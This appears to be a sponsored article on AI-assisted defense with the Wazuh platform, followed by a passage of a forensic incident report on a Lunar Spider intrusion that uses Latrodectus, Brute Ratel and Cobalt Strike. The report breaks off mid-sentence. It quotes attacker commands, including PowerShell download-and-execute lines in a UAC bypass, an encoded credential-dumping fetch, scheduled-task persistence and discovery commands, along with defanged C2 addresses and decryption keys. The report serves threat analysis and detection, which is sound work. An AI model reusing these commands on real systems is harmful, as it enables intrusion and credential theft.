Artificial Intelligence (AI) refers to computer programs designed to perform tasks that typically require human intelligence. These include learning, problem-solving, decision-making, and perception. AI systems use big data and algorithms to analyze information, adapt their behavior, and achieve goals without constant human oversight. The rapid improvements in AI capabilities enable advanced attacks by malicious actors. Attackers no longer rely solely on manual intrusion attempts. They harness automation, AI-driven malware, and Living off the Land (LOTL) tactics that blend with legitimate activity. Organizations must adopt equally advanced technologies to defend against this new threat landscape. In modern security operations, AI is indispensable. It applies not only to anomaly detection but also to log correlation, malware classification, phishing detection, and threat intelligence. The key advantage lies in speed and scale. AI can process millions of events across distributed environments and highlight suspicious activity in minutes, something human analysts could never achieve. Challenges with traditional detection methods Traditional detection methods are effective against known threats but often struggle with scale and adaptability. Security teams face these challenges: Alert fatigue: Security Operations Centers (SOCs) often drown in thousands of daily alerts. Most are false positives or low priority, but analysts must review them. The repetitive nature of this work creates alert fatigue, where genuine threats are overlooked or not properly treated due to the overwhelming noise. This directly contributes to analyst burnout and increases Mean Time to Detect (MTTD). Rapid exploitation of vulnerabilities: When new vulnerabilities are disclosed, threat actors can weaponize them within days or even hours. Proof of Concept (PoC) exploits are quickly shared across forums and integrated into botnets or ransomware kits. Organizations relying on manual patch cycles or traditional vulnerability scanners are left exposed, often for weeks. This gives attackers a significant advantage. Evasion through legitimate processes: Modern adversaries increasingly hide their activity by leveraging existing tools and methods in the target environment. This includes Living off the Land (LOTL) techniques such as abusing and exploiting trusted applications, system services, or even security tools to mask malicious behavior. Because these processes are also used daily by administrators and business applications, distinguishing between routine operations and malicious use is highly challenging. As a result, signature-based defenses often fail. Overwhelming data volumes: Large enterprises can generate petabytes of logs across endpoints, servers, applications, and cloud services. Even with powerful indexing and search engines, correlating this data in real-time is nearly impossible with static rule sets. This data overload leads to blind spots where attackers can hide. Advanced phishing campaigns: Phishing remains the most common initial attack vector for malware and credential theft. With generative AI, adversaries craft compelling emails free of grammatical errors and inconsistencies. To the human eye, these attacks are nearly indistinguishable from genuine communications. Insider threats and account compromise: Insiders with malicious intent or compromised user accounts often operate within the boundaries of normal access rights. Their activities blend in with legitimate business processes, making them difficult to detect without establishing a historical baseline of behavior. Zero-day and unknown threats: Signature-based security tools depend on known patterns of malicious activity. Zero-day exploits and polymorphic malware bypass these defenses by constantly changing their code or leveraging new techniques. As a result, defenders are always a step behind. How Artificial Intelligence helps address these challenges With the scale of today’s cyber threats laid out, it is easier to see where AI makes its mark. The benefits of AI are not abstract or futuristic; they directly counter the pain points security teams face daily. From reducing alert fatigue to automating compliance, AI introduces speed, accuracy, and scalability into areas where human analysts are often overwhelmed. AI addresses these challenges in some ways: Noise reduction and prioritization: Machine learning algorithms can filter repetitive alerts, correlate related events, and prioritize incidents that pose the most significant risk. By reducing false positives, AI allows analysts to focus their energy on high-value alerts instead of sifting through endless noise. Vulnerability prioritization: AI-driven vulnerability management platforms go beyond identifying missing patches. They assess exploitability in the wild, exposure within the organization’s environment, and the potential business impact. This enables IT teams to focus remediation efforts where they are most critical, effectively reducing the window of opportunity for attackers. Behavioral analysis of legitimate process activity: AI goes beyond static signatures by learning what “normal” looks like for legitimate tools and processes in a given environment. AI can establish baselines for typical usage patterns, such as when, how often, and under what context these processes are executed. Continuously analyzing deviations from these baselines highlights suspicious activity that might otherwise be dismissed as routine IT operations. This helps uncover stealthy activities that blend into everyday operations. Scalable data processing: Unlike traditional systems that struggle with heavy log volumes, AI models can ingest and analyze massive amounts of structured and unstructured data in real-time. This provides defenders with actionable insights across entire infrastructures, eliminating blind spots. Advanced insider threat detection: AI-powered User and Entity Behavior Analytics (UEBA) continuously learn the habits of employees and systems. Suspicious activities, such as unusual login times, accessing atypical data sets, or abnormal privilege escalations, are automatically flagged, allowing proactive detection of insider threats. Phishing detection through NLP: Natural language processing (NLP) models can detect malicious intent in email content, even when the message looks professional. With header analysis and sender reputation scoring, AI tools identify phishing attempts that would otherwise slip past traditional filters. Automated incident response: AI-enhanced SOAR (Security Orchestration, Automation, and Response) platforms can recommend or automatically execute actions such as isolating compromised endpoints or blocking malicious IP addresses. This reduces mean time to respond (MTTR) from hours to minutes. How Wazuh is adopting Artificial Intelligence for stronger cyber defense Wazuh is a free and open source security platform that unifies XDR and SIEM capabilities. It protects workloads across on-premises, virtualized, containerized, and cloud-based environments. Wazuh integrates AI capabilities in multiple features to improve detection, investigation, and situational awareness. Below are some ways Wazuh uses AI to make cybersecurity defenses more innovative and responsive. AI-Generated insights from security data Security platforms collect massive amounts of data, alerts, vulnerability scans, and endpoint logs, but analysts often lack the time to extract patterns or summarize trends. Valuable context is buried in dashboards, reports, and raw telemetry. Without distilled insights, decision-making slows down and threats might slip by unnoticed. Wazuh showcased the integration of Claude 3.5 Haiku through AWS Bedrock into its dashboard in the blog post Leveraging Claude Haiku in the Wazuh dashboard for LLM-Powered insights. The integration requires enabling AI assistant plugins and configuring AWS IAM credentials. Once connected, Claude provides contextual answers, not just raw log snippets. This bridges the gap between alerts and action by embedding expert knowledge directly into the monitoring workflow. This integration adds a chat assistant feature to the Wazuh dashboard interface, where users can query the system in natural language. The following are examples of how AI can turn raw security data into actionable insights: Guided vulnerability response Prompt example: “What do I do when I see a vulnerability alert?” Vulnerability alerts can be overwhelming, especially without clear remediation guidance. AI-generated insights provide context on the alert severity, potential impact, and recommended response steps, enabling security teams to act quickly and effectively. Automated configuration guidance Prompt example: “How do I configure active responses for brute-force attempts?” Instead of digging through documentation, analysts can query the AI directly for configuration steps. The assistant responds with practical, actionable guidance on setting up automated countermeasures such as blocking IP addresses or isolating endpoints, streamlining the deployment of active defenses. Running service vulnerability profiling and contextual audit Network audits often reveal many open ports and services across endpoints. Knowing that a port is open is only part of the picture. Security teams must understand what services are running, whether they have known vulnerabilities, and how they might be exploited. Without this context, open services can become weak spots, especially if they are running outdated software or exposed to the internet unnecessarily. The Nmap and ChatGPT security auditing with Wazuh blog post shows how integrating Nmap scans with ChatGPT allows analysts to uncover more than just “what is open”. Wazuh can run periodic Nmap scans through its command monitoring modules, collecting outputs of open ports and the corresponding service versions. This data is then sent to ChatGPT (via API), which returns enriched information about each open service, including potential vulnerabilities and remediation guidance. This results in analysts gaining guided assistance when interpreting alerts or planning remediation. By reducing the time spent cross-referencing documentation, the AI assistant helps security teams respond more quickly and confidently. AI-Enhanced threat hunting Threat hunting is essential for detecting stealthy attacks that bypass signatures and rules. However, doing so manually across millions of logs is resource-intensive and requires expert analysts. Leveraging artificial intelligence for threat hunting in Wazuh blog post shows how Wazuh uses Llama 3 (via Ollama) with vector embeddings and Facebook AI Similarity Search (FAISS) to search archived logs semantically. Instead of relying on keyword matches, analysts can query in natural language, and the system retrieves contextually relevant results. The following are examples of how AI can assist security teams in uncovering hidden threats: Intrusion detection Prompt example: “Identify SSH brute-force attempts last week.” Brute-force attacks often blend into the noise of authentication logs, making them difficult to catch with static searches. With AI-enhanced hunting, analysts can query logs in natural language and quickly retrieve events showing repeated failed login attempts, highlighting intrusion attempts that might otherwise be overlooked. Data exfiltration monitoring Prompt example: “Check for signs of data exfiltration.” Detecting unauthorized data transfers requires analyzing large volumes of network and system logs. AI-powered hunting enables analysts to search semantically across historical data, surfacing anomalies such as unusual file transfers or suspicious outbound connections that could indicate exfiltration attempts. This approach allows Wazuh to uncover threats that might otherwise remain hidden while enabling retrospective investigations. By embedding conversational AI into hunting workflows, Wazuh gives analysts an efficient way to ask more profound, more flexible questions of their data. Wazuh AI analyst service As more workloads and infrastructure move to the Cloud, security teams deal with increasingly distributed environments, larger attack surfaces, and massive system data volumes. Traditional approaches to monitoring and response can struggle to keep pace with this scale and complexity. This is where the Wazuh AI analyst becomes particularly relevant. Designed for Wazuh Cloud users, Wazuh AI analyst is an emerging feature that gives security teams a conversational investigation partner. While still in its early stages, it aims to augment security teams by providing alerts summaries, contextual enrichment, and next-step guidance. This service provides automated, AI-driven security analysis by combining Wazuh Cloud with advanced machine learning models. It processes security data at scale to generate actionable insights that strengthen an organization’s overall security posture. By embedding AI into Wazuh Cloud, organizations gain a scalable security ally that grows with their infrastructure and strengthens their ability to respond to threats. Conclusion The cybersecurity landscape is shifting rapidly. Defenders cannot afford to remain static with attackers adopting automation, stealth, and AI-driven tactics to outpace traditional defenses. Artificial intelligence is no longer optional in digitized environments; it is becoming an essential layer of modern cyber defense. By reducing noise, uncovering hidden threats, and accelerating response, AI empowers security teams to stay ahead of adversaries. AI is not replacing human expertise; it is augmenting it. Human analysts bring critical thinking, creativity, and context that machines cannot replicate. AI, on the other hand, delivers unmatched speed, scalability, and consistency. Together, they create a layered defense that matches the sophistication of modern threats. Wazuh demonstrates this shift in practice. AI-enhanced threat hunting, intelligent insights, and the emerging Wazuh AI Analyst for cloud users show how AI can be integrated into workflows that ensure defenders can handle the growing complexity of cyber attacks. Discover more about Wazuh by exploring their documentation and joining their growing community of professionals. Sponsored and written by Wazuh.
bleepingcomputer.comOct 6, 2025extracted
From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion
Key Takeaways The intrusion began with a Lunar Spider linked JavaScript file disguised as a tax form that downloaded and executed Brute Ratel via a MSI installer. Multiple types of malware were deployed across the intrusion, including Latrodectus, Brute Ratel C4, Cobalt Strike, BackConnect, and a custom .NET backdoor. Credentials were harvested from several sources like LSASS, backup software, and browsers, and also a Windows Answer file used for automated provisioning. Twenty days into the intrusion data was exfiltrated using Rclone and FTP. Threat actor activity persisted for nearly two months with intermittent command and control (C2) connections, discovery, lateral movement, and data exfiltration. This case was featured in our September 2025 DFIR Labs Forensics Challenge and is available as a lab today here for one time access or included in our new subscription plan. It was originally published as a Threat Brief to customers in Feb 2025 The DFIR Report Services Private Threat Briefs: 20+ private DFIR reports annually. Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc. All Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor Insights reports, long-term tracking, data clustering, and other curated intel. Private Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT&CK with test examples. DFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs are available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds. Contact us today for pricing or a demo! Table of Contents: The intrusion took place in May 2024, when a user executed a malicious JavaScript file. This JavaScript file has been previously reported as associated with the Lunar Spider initial access group by EclecticIQ. The heavily obfuscated file, masquerading as a legitimate tax form, contained only a small amount of executable code dispersed among extensive filler content used for evasion. The JavaScript payload triggered the download of a MSI package, which deployed a Brute Ratel DLL file using rundll32. The Brute Ratel loader subsequently injected Latrodectus malware into the explorer.exe process, and established command and control communications with multiple CloudFlare-proxied domains. The Latrodectus payload was then observed retrieving a stealer module. Around one hour after initial access, the threat actor began reconnaissance activities using built-in Windows commands for host and domain enumeration, including ipconfig, systeminfo, nltest, and whoami commands. Approximately six hours after initial access, the threat actor established a BackConnect session, and initiated VNC-based remote access capabilities. This allowed them to browse the file system and upload additional malware to the beachhead host. On day three, the threat actor discovered and accessed an unattend.xml Windows Answer file containing plaintext domain administrator credentials left over from an automated deployment process. This provided the threat actor with immediate high-privilege access to the domain environment. On day four, the threat actor expanded their activity by deploying Cobalt Strike beacons. They escalated privileges using Windows’ Secondary Logon service and the runas command to authenticate as the domain admin account found the prior day. The threat actor then conducted extensive Active Directory reconnaissance using AdFind. Around an hour after this discovery activity they began lateral movement. They used PsExec to remotely deploy Cobalt Strike DLL beacons to several remote hosts including a domain controller as well as file and backup servers. They then paused for around five hours. On their return, they deployed a custom .NET backdoor that created a scheduled task for persistence and setup an additional command and control channel. They also dropped another Cobalt Strike beacon that had a new command and control server. They then used a custom tool that used the Zerologon (CVE-2020-1472) vulnerability to attempt additional lateral movement to a second domain controller. After that they then tried to execute Metasploit laterally to that domain contoller via a remote service. However they were unable to establish a command and control channel from this action. On day five, the threat actor returned using RDP to access a new server that they then dropped the newest Cobalt Strike beacon on. This was then followed by an RDP logon to a file share server where they also deployed Cobalt Strike. Around 12 hours after that they returned to the beachhead host and replaced the BruteRatel file used for persistence with a new BruteRatel badger DLL. After this there was a large gap before their next actions. Fifteen days later, the 20th since initial access, the threat actor became active again. They deployed a set of scripts to execute a renamed rclone binary to exfiltrate the data from the file share server. This exfiltration used FTP to send data over a roughly 10 hour period to the threat actor’s remote host. After this concluded there was another pause in threat actor actions. On the 26th day of the intrusion the threat actor returned to the backup server and used a PowerShell script to dump credentials from the backup server software. Two days later on the backup server they appeared again and dropped a network scanning tool, rustscan, which they used to scan subnets across the environment. After this hands on activity ceased again. The threat actor maintained intermittent command and control access for nearly two months following initial compromise, leveraging BackConnect VNC capabilities and multiple payloads, including Latrodectus, Brute Ratel, and Cobalt Strike, before being evicted from the environment. Despite the extended dwell time and comprehensive access to critical infrastructure, no ransomware deployment was observed during this intrusion. If you would like to get an email when we publish a new report, please subscribe here. Analysis and reporting completed by @RussianPanda9xx, Christos Fotopoulos, Salem Salem, reviewed by @svch0st. The infection began with the execution of a Latrodectus JavaScript file, Form_W-9_Ver-i40_53b043910-86g91352u7972-6495q3.js, first reported on X by @Cryptolaemus1 in the following post: The malware was first uploaded to VirusTotal on May 9, 2024, prior to Operation Endgame. This operation occurred between May 27 and 29, 2024, during which law enforcement dismantled multiple botnets, including Latrodectus. After the take down of the botnet, Latrodectus reappeared in June 2024, using tax-themed phishing campaigns as its initial access mechanism that dropped Latrodectus version 1.3 along with Brute Ratel, according to this article by Trustwave. Although our sample was from May and its file name was related to a W-9 tax form, it was version 1.3 of the malware and additionally it utilized Brute Ratel. Based on that, we believe it to be an early version of the campaign that was used later in June. This report from Rapid7, also from June 2024, shows a malicious ad as the initial access used to lure a victim to download the malicious Javascript file. Given the similarity of that report and our initial malware behavior we assess that this we likely the same method used for our case as well. The heavily obfuscated JS file contained multiple lines starting with //, which included filler text. After further analyzing the file, a deobfuscation workflow was identified, executing all the lines of code starting with ////. Deobfuscating the Latrodectus malware, uncovered that it performed an HTTP request to the URL hxxp://91.194.11[.]64/MSI.msi to install the next stage, thus triggering the Suricata rule from Emerging Threats ET POLICY Observed MSI Download. Static analysis of the MSI package revealed that upfilles.dll was embedded within the compressed disk1.cab archive. The MSI installer utilized a custom action to execute the DLL via the legitimate Windows binary rundll32.exe, specifically invoking the exported function stow to initiate malicious execution. Brute Ratel On day one, the loader upfilles.dll began execution on the beachhead host by resolving three APIs (VirtualAlloc, LoadLibraryA, GetProcessAddress) via the following hashing algorithm: for char in api_name: char_byte = ord(char) # Converts to lowercase, adds current hash temp = (char_byte | 0x60) + hash_value # Double for position-dependent hash hash_value = 2 * temp return hash_value Then it decrypted the intermediary Brute Ratel payload via an XOR decryption algorithm using the embedded key: 21 79 3C 7A 39 5F 3E 24 54 4A 7A 35 6C 33 3E 32 5F 66 74 76 6D 59 3C 4D 00 The shellcode above then decrypted the BRC4 badger via the RC4 key 71 24 70 2C 7D 70 61 3F. Below are the decrypted Brute Ratel C4 (BRC4) C2s and RC4 key to decrypt the gathered information on the infected system that is sent to the C2. The subsequent YARA rule triggered during a scan of the process memory for Brute Ratel: On day five, the threat actor deployed a new Brute Ratel DLL through the established BackConnect session: rundll32 wscadminui.dll, wsca The wscadminui.dll file serves as the Brute Ratel badger payload, maintaining the same obfuscation patterns established by the upfilles.dll loader. Decryption of the intermediary BRC4 payload is achieved through XOR operations using the embedded key sequence 75 36 58 33 64 4F 61 3F 4B 59 23 42 77 42 6F 41 39 6D 6E 4E 5E 46 56 47 66 41 00. Latrodectus After executing, Brute Ratel deployed Latrodectus malware through process injection into explorer.exe leveraging CreateRemoteThread API. Latrodectus, a downloader first identified by Proofpoint researchers in November 2023, is attributed to the same threat actors responsible for developing IcedID. Approximately six hours later, the process running Latrodectus established a connection to 193.168.143[.]196 on the beachhead host, which we suspect to have been a BackConnect C2 server. BackConnect is a post-compromise module that was initially deployed by IcedID, allowing threat actors to leverage infected systems for remote access through VNC modules. Multiple security researchers, such as Elastic Security Labs, hypothesize that Latrodectus is a potential successor to IcedID, due to code reuse and behavioral similarities, including the use of the same commands in the Discover flag. An hour after this traffic started, the following command was executed to switch to UTF-8 encoding: cmd.exe /K chcp 65001 && c: && cd c:\ This command was previously observed in Keyhole, a multi-functional VNC/BackConnect component used by IcedID, and prior cases involving IcedID infection. A few minutes later, Latrodectus spawned DLLHost.exe to likely inject the BackConnect payload with PROCESS_ALL_ACCESS (0x1fffff) access rights. The granted access rights provide full control over the target process, enabling memory manipulation, thread creation, and DLL injection capabilities. lsassa.exe Backdoor On day four, the threat actor deployed and executed a binary named lsassa.exe via BackConnect on the beachhead host. The lsassa.exe file was a .NET backdoor that contained an encrypted payload embedded in an assembly resource file named lsassa&&. Inside this resource, a small header was present declaring which protections were used (encryption and/or compression). If encryption is used, it either uses a key embedded in the file or derives one from the assembly’s public key token, then decrypts the payload. If compression is enabled, the code decompresses the decrypted data before loading it. The backdoor implemented a persistent command and control system that establishes covert communication between an infected machine and a remote threat actor controlled server while creating a scheduled task for persistence. Upon initialization, the backdoor establishes a timer-based polling mechanism that triggers every 250 seconds to maintain regular contact with the C2 infrastructure and uses extracted obfuscated strings to construct the command. In our case, the threat actor leveraged the backdoor to create a scheduled task on the beachhead host with the command: "cmd.exe" /c schtasks /create /tn "SchedulerLsass" /tr "%ALLUSERSPROFILE%\USOShared\lsassa.exe" /sc onstart During each communication cycle, the backdoor collects basic system reconnaissance data, including the username and machine name of the infected host, then transmits it to a remote server endpoint. The server C2 (hxxps://cloudmeri.com/comm[.]php) was obfuscated and embedded within the resource file name lsassa$ from the decrypted resource file lsassa&&. After successfully transmitting the victim data, the backdoor waits for a server response containing executable commands. When commands are received from the remote server, the backdoor validates that the response content is not empty and executes the payload through the Windows command interpreter. The execution occurs by spawning a new cmd.exe process with the UseShellExecute flag disabled and CreateNoWindow enabled to maintain stealth, while redirecting standard output and error streams to capture results. The backdoor includes a special termination command that allows the remote operator to exit the backdoor by calling Environment.Exit when a specific response string is received. The backdoor conceals its strings in an encrypted resource and only reveals them at runtime. The extraction function first reads a length value to determine how many bytes to pull, then converts those bytes into readable text using Unicode encoding. Cobalt Strike Several Cobalt Strike beacons were utilized over the course of the intrusion. The first was observed on day four, where the cron801.dl_ file was dropped on the beachhead host under C:\ProgramData from the injected explorer.exe process containing Latrodectus and was then executed twice by leveraging BackConnect. rundll32 cron801.dl_,lvQkzdrFdILT The outbound connection was established with the Cobalt Strike server at hxxp://45.129.199[.]214/vodeo/wg01ck01. Shortly after, the Cobalt Strike beacon spawned from rundll32.exe was injected into sihost.exe process. Analysis of network traffic revealed a JSON response containing minified Vuetify v3.0.3 JavaScript served by the Cobalt Strike C2 server. This discovery led to the identification of additional potentially related C2 servers using Virustotal searches for similar characteristics (JSON response content or the URL path /vodeo/): hxxp[://]94[.]232[.]40[.]49/vodeo/wg01ck01 hxxps[://]techbulldigital[.]com/Apply/readme/VJICARU60DC?_WHBEXNIA=HNMIIIANEMPMLIDFEOPKLBDOEMPI hxxp[://]techbulldigital[.]com/List/com2/9O29EO3IRSBB hxxp[://]filomeruginfor[.]com/christian/house/cwk01 hxxp[://]filomeruginfor[.]com/deolefor/wg01ck01m hxxps[://]wehelpgood[.]xyz/Complete/v9[.]56/KT84GVGD135E hxxps[://]wehelpgood[.]xyz/derive/n/nzoqjd9mme hxxp[://]94[.]232[.]249[.]186/vodeo/vid_wg01ck01 hxxp[://]94[.]232[.]249[.]186/vodeo/wg01ck01 Later the cron801.dl_ file was renamed system.dl_ and deployed to several hosts, this is covered further in the Lateral Movement section Later on the same day, after the execution of the lsassa.exe backdoor, the threat actor dropped sys.dll. This was another Cobalt Strike stager containing shellcode that exhibits similarities to the payload documented in this report, via the BackConnect session on the beachhead host. The threat actor executed it via BackConnect with the command: rundll32 %ALLUSERSPROFILE%\sys.dll,StartUp471 The Cobalt Strike implant initiated outbound communication to 206.206.123[.]209:443 (avtechupdate[.]com) before injecting itself into the sihost.exe process. After the attempted UAC bypass, the Cobalt Strike stager was executed in memory with the C2 pointing to resources.avtechupdate[.]com/samlss/vm.ico. Shortly after, the sihost.exe process (containing an injected Cobalt Strike beacon) used RUNAS execution to create a new process (“gpupdate.exe”) running as the “Domain Admin” account, as described in the Privilege Escalation section. Subsequently, the compromised sihost.exe process, containing an injected Cobalt Strike beacon, leveraged the RUNAS command to spawn a new gpupdate.exe process under the domain admin account. The gpupdate.exe process then injected a Cobalt Strike beacon into the spoolsv.exe process space. Both spoolsv.exe and gpupdate.exe processes were observed creating named pipes consistent with Cobalt Strike communication patterns. The following day the sys.dll Cobalt Strike beacon was executed on two additional servers after connections to those hosts were made via RDP. Registry Run Key Persistence was first established after initial access on day one via a Registry Run key. This was achieved via the rundll32.exe process that created a Run key, with an innocuous name of Update, which would execute the Brute Ratel badger, upfilles.dll, if the system was restarted. The Run key was updated multiple times during the intrusion to point to wscadminui.dll in place of upfilles.dll. We could not determine why the actor re-applied the same change on several occasions. Scheduled Tasks In addition to the Run key the threat actor created a scheduled task on the fourth day of the intrusion on the beachhead host. The scheduled task was created by lsassa.exe which has been explained in further detail in the Execution section. Runas The threat actor activated Windows’ Secondary Logon service to enable the runas command – a built-in Windows feature that allows running programs under different user credentials. By calling this service, they were able to authenticate as the domain admin account found in the unattend.xml file and escalate their privileges from a regular user to full administrative control over the network The Windows authentication log shows successful privilege escalation from a low-privileged user to a domain administrator account with elevated token permissions. UAC Bypass The Cobalt Strike sys.dll implant executed on the beachhead host initiated a UAC bypass using the elevate uac-token-duplication technique, a well-documented registry hijacking method first observed in 2017. This technique exploits the UAC token duplication vulnerability, allowing the Cobalt Strike implant to execute arbitrary code with privileges stolen from elevated processes, successfully achieving privilege escalation without user interaction. Initial registry modifications hijacked the ms-settings protocol handler to redirect Windows Settings calls to malicious PowerShell commands: reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:11664/')" reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /f /d "cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:11664/')" Privilege escalation occurred through execution of ComputerDefaults.exe, a trusted Windows binary that queries the hijacked ms-settings protocol with elevated privileges. With the elevated token duplicated from ComputerDefaults.exe, multiple PowerShell instances were executed to establish communication with the Cobalt Strike listener, indicating token rights restrictions requiring different execution approaches: "cmd.exe" /c powershell -nop -w hidden -c "IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:11664/')" powershell -nop -w hidden -c "IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:11664/')" "C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Process Injection The most common evasion technique that the threat actor utilized was process injection. During its execution, the Brute Ratel loader upfilles.dll launched the final stage of the Latrodectus malware inside the explorer’s memory. From the fourth day onward, the threat actor expanded their tooling and heavily utilized both Brute Ratel and Cobalt Strike for process injection. Using the Sysmon eventID 8, CreateRemoteThread, multiple instances of process injection were identified for both long-term and short-term sacrificial processes. After further investigating the process memory, YARA rules confirmed also the injection of Cobalt Strike beacons into multiple legitimate processes, such as spoolsv.exe. File Deletion Τhe threat actor also deleted files after using them, to cover their tracks and make the investigation more challenging. Specifically, they deleted more than half of the files and tools that had been downloaded on the compromised hosts. Latrodectus Stealer Module Using command ID 21, the Latrodectus-injected explorer.exe process downloaded the stealer module file fxrm_vn_9.557302425.bin from the C2 server. Analysis revealed that the stealer lacks functionality to decrypt cookies from current Chrome versions, suggesting the threat actor may not have updated their stealer module to accommodate recent browser security enhancements. The stealer had the hardcoded time of when the stealer module was built – 00:39:18 Mar 29 2024. Similar to the Latrodectus loader component, the stealer module dynamically resolved Windows APIs by iterating through the Process Environment Block (PEB) InLoadOrderModuleList, computing CRC32 hashes for each loaded module name, and comparing results against target hash values. The stealer was capable of harvesting credentials from 29+ Chromium-based browsers, including Google Chrome, Microsoft Edge, Yandex Browser, Vivaldi, Comodo Dragon, Orbitum, Epic Privacy Browser, and other variants. Firefox receives separate handling through profile enumeration targeting cookies.sqlite database files. During its execution, it extracted email credentials from Microsoft Outlook configurations across Office versions 11.0-17.0 by querying Windows registry keys. The stealer is also capable of harvesting server configurations including SMTP, POP3, IMAP, and NNTP server addresses, port numbers, usernames, and encrypted passwords. Additionally, it targeted the registry path HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles to extract legacy email configurations from older Windows Mail, Outlook Express, and MAPI profiles that may contain additional cached credentials. Internet Explorer credentials were obtained through COM interface manipulation, accessing the IntelliForms Storage2 system. The collected data is organized into distinct sections with the below headers: - cr_pass for Chrome passwords - ff_pass for Firefox data - ie_pass for Internet Explorer credentials - edge_pass for Edge data - outlook_pass for email configurations - _cookie variants for session data. Each section contains structured entries with pipe-delimited fields. The complete dataset undergoes base64-encoding. The stealer then creates a shared memory region named 12345 and stores a pointer to the encoded data, which could allow other processes to access the collected information. Answer File Access Backconnect was used by the threat actor early in the campaign (day three) to list directories on the beachhead. After listing files in directories, the threat actor focused their attention on the file unattend.xml, an answer file. Answer files are used to control the configuration of Windows while setting it up from an image. One of the components of answer files is called Microsoft-Windows-UnattendedJoin which allows admins to easily domain join devices during setup, this is done by supplying plain text credentials (username and password) in the unattend.xml file. The threat actor collected the file via Backconnect (using the GET C:\Unattend.xml command) and was able to access the plain-text domain admin credentials stored in the file. LSASS Access The threat actor utilized their elevated user permissions to access the LSASS process on multiple devices in the environment. All instances of LSASS access followed the same pattern, the access was initiated by an injected process (either runonce.exe or gpupdate.exe) with a process requesting 0x1010 permissions and another instance of the same process requesting 0x1fffff seconds later. This cycle repeated three times in total during the intrusion, each time facilitated via a Cobalt Strike beacon process. Veeam-Get-Creds On day 26 of the intrusion, the threat actor ran the Veeam-Get-Creds.ps1 script from the injected spoolsv.exe process: powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADQAMAAwADMALwAnACkAOwAgAFYAZQBlAGEAbQAtAEcAZQB0AC0AQwByAGUAZABzAC4AcABzADEA which decoded to: IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:24003/'); Veeam-Get-Creds.ps1 This technique has been previously observed by ransomware groups such as Noberus and Vice Society. It typically indicates the threat actor is targeting backup systems for destruction or virtualization infrastructure for encryption (commonly protected by Veeam backup solutions). The Veeam-Get-Creds.ps1 script is publicly available on GitHub. Upon executing the script, the threat actor would have obtained any plaintext usernames and passwords stored in the Veeam Credential Manager. These credentials are typically used to authenticate to remote systems for backup operations. Although in this intrusion, this execution was one of the final actions taken by the threat actor. Approximately one hour after Latrodectus was injected into explorer.exe, it began executing the following discovery commands on the beachhead host. ipconfig /all systeminfo nltest /domain_trusts nltest /domain_trusts /all_trusts net view /all /domain net view /all net group "Domain Admins" /domain net config workstation wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed whoami /groups Process activity related to discovery then went quiet until on day four, the injected Cobalt Strike beacon used systeminfo to query for system information. The threat actor then executed DISK command via BackConnect to query disk information. The Cobalt Strike injected processes then executed reconnaissance commands and leveraged AdFind for Active Directory enumeration activities: systeminfo nltest /dclist:domain.local net view REDACTED net user REDACTED /domain dir \\REDACTED\C$ net group "domain admins" /domain dsquery subnet nltest /domain_trusts nltest /dsgetdc:domain.local wmic /node:REDACTED logicaldisk list brief AdFind Active Directory Enumeration: adfind.exe -f "(objectcategory=person)" >> ad_users.txt adfind.exe -f "objectcategory=computer" >> ad_computers.txt%W adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt adfind.exe -subnets -f (objectCategory=subnet)> ad_subnets.txt adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt adfind.exe -f "&(objectCategory=computer)(operatingSystem=*server*)" -csv > ad_servers.csv Continued Discovery and Network Testing: net view REDACTED ping -n 1 REDACTED type "\\REDACTED\C$\REDACTED\REDACTED.bat" The threat actor then tried to move AdFind outputs, but appeared to struggle based on the commands observed: C:\PerfLogs\*.* %ALLUSERSPROFILE%\ move %ALLUSERSPROFILE%\ad_users.txt C:\REDACTED\ move C:\REDACTED\ad_users.txt %PUBLIC%\ While this was happening, they continued to issue more discovery commands and attempted to organize their AdFind output: net view REDACTED wmic /node:REDACTED logicaldisk list brief %WINDIR%\system32\cmd.exe /C ping -n 1 REDACTED move %USERPROFILE%\ad_users.txt %USERPROFILE%\Pictures\ attrib %USERPROFILE%\Pictures\ad_users.txt The actor then expanded their reconnaissance to include DNS information while simultaneously troubleshooting file access issues on their collected data: dnscmd /zoneprint domain.local netdom query SERVER >> serv.log attrib -a -s -h -r /s %USERPROFILE%\Pictures\ad_users.txt attrib %USERPROFILE%\Pictures\ad_users.txt attrib %USERPROFILE%\Pictures\*.* attrib -a +s +h -r /s %USERPROFILE%\Pictures\ad_users.txt Minutes later, the compromised explorer.exe process spawned DllHost.exe, indicating resumption of the BackConnect VNC activity observed previously. The DllHost.exe process subsequently executed a Windows shell command to open the “This PC” interface on the beachhead host: cmd.exe /c start "" C:\Windows\explorer.exe shell:mycomputerfolder The session was then leveraged to attempt to view the AdFind results: "C:\Windows\system32\NOTEPAD.EXE" "C:\Users\ \Pictures\ad_users.txt" The threat actor continued to encounter file permission issues, preventing them from accessing their own data. They attempted to resolve this by first setting the local user as the file owner, then switching to the domain account as owner, and when both ownership changes failed to provide 